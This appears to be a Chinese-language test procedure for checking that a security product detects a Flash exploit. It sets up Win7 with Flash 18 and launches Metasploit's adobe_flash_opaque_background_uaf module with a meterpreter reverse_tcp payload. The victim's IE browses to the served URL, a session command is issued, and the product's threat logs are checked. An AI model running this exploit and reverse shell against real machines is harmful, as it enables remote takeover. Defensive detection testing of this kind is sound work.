测试机:windows7 32位
测试步骤:
准备Win7-X86并安装Flash18 如果安装提示不是最新版本,需要去注册表-删除HKEY—LOCAL—MACHINE\SOFTWARE\Macromedia\flashplayer\safeversions 中18以及以上的版本
安装后运行命令msfconsole
msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.12.104.180:4444
[*] Using URL: http://0.0.0.0:8080/87vfKMyJLK
[*] Local IP: http://10.12.104.180:8080/87vfKMyJLK
[*] Server started.
在测试电脑上(需使用Win7X86)安装Adobe Flash Player 18.0.0.203 (IE).exe和探针,拷贝生成的链接地址http://10.12.104.180:8080/87vfKMyJLK粘贴到测试电脑上的IE浏览器中并敲击回车。
回到Kali系统,在shell中输入命令: sessions –c “explorer.exe”,命令执行会自动拦截,等待1-2分钟,登录产品管理系统,点击入侵检测菜单并选择网络威胁日志,进入高级威胁日志页后点击查询按钮,可以查看到攻击日志。